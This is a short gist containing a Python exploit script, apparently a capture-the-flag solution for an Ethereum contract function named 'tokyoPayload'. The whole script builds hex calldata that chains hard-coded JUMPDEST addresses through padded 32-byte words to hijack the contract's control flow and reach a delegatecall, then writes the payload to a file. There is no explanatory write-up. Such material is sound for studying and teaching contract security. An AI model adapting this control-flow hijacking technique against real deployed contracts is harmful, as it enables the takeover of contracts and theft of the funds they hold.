@kangsangsoo
Created September 22, 2023 08:45
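# All values below are hex strings and the payload itself is assembled as a
# hex string, so `len(payload) // 2` is the payload size in bytes and every
# `.rjust(64, "0")` left-pads a value to one 32-byte word.
JUMPDEST_RET_FUNCS = "018f"
JUMPDEST_LOAD = "d0"
JUMPDEST_GASLIMIT = "0153"
JUMPDEST_POP_4 = "018f"
JUMPDEST_DELEGATE = "01a3"
x = "01c2"
l = "371d"
DUMMY = "DE"  # one filler byte; `DUMMY * n` pads by n bytes
SIG_tokyoPayload = "000040c3"

payload = SIG_tokyoPayload  # func sig (4 bytes, not word-aligned)
payload += "7b".rjust(64, "0")  # x
payload += JUMPDEST_LOAD.rjust(64, "0")  # y => first call pointer and second call addr
payload += DUMMY * 1  # align
# Pad so the next word starts at byte offset int(JUMPDEST_RET_FUNCS, 16).
payload += DUMMY * (int(JUMPDEST_RET_FUNCS, 16) - len(payload) // 2)
payload += "aa" * 32
payload += JUMPDEST_LOAD.rjust(64, "0")  # third call
# The argument is the byte offset of the word that follows this one.
payload += hex(len(payload) // 2 + 32)[2:].rjust(64, "0")  # second call's arg0 => i
payload += "bb" * 32
payload += JUMPDEST_GASLIMIT.rjust(64, "0")  # fourth call
payload += hex(len(payload) // 2 + 32)[2:].rjust(64, "0")  # third call's arg0 => i
payload += "cc" * 32
payload += JUMPDEST_DELEGATE.rjust(64, "0")  # fifth-call arg0 => x => seventh-call
payload += x.rjust(64, "0")  # fifth-call arg1 => y
# Pad so the next word starts at byte offset JUMPDEST_LOAD * 0x20 + 5.
payload += DUMMY * ((int(JUMPDEST_LOAD, 16)) * 0x20 - len(payload) // 2 + 5)
assert len(payload) // 2 == (int(JUMPDEST_LOAD, 16)) * 0x20 + 5
payload += JUMPDEST_LOAD.rjust(64, "0")  # first call addr
print(len(payload))  # hex-string length, i.e. twice the byte count
# pop x 4
# 0x1a3 + l - 0x80 = 0x20 * x
# l > len(payload)
# x = 450(0x1c2) => l = 14109(0x371d)
# Pad so the final word starts at byte offset int(l, 16).
payload += DUMMY * (int(l, 16) - len(payload) // 2)
assert len(payload) // 2 == (int(l, 16))
payload += JUMPDEST_POP_4.rjust(64, "0")  # sixth-call
# Write the hex payload to pay.txt in the current directory; the context
# manager closes (and so flushes) the file even if write() raises.
with open("pay.txt", "w") as out:
    out.write(payload)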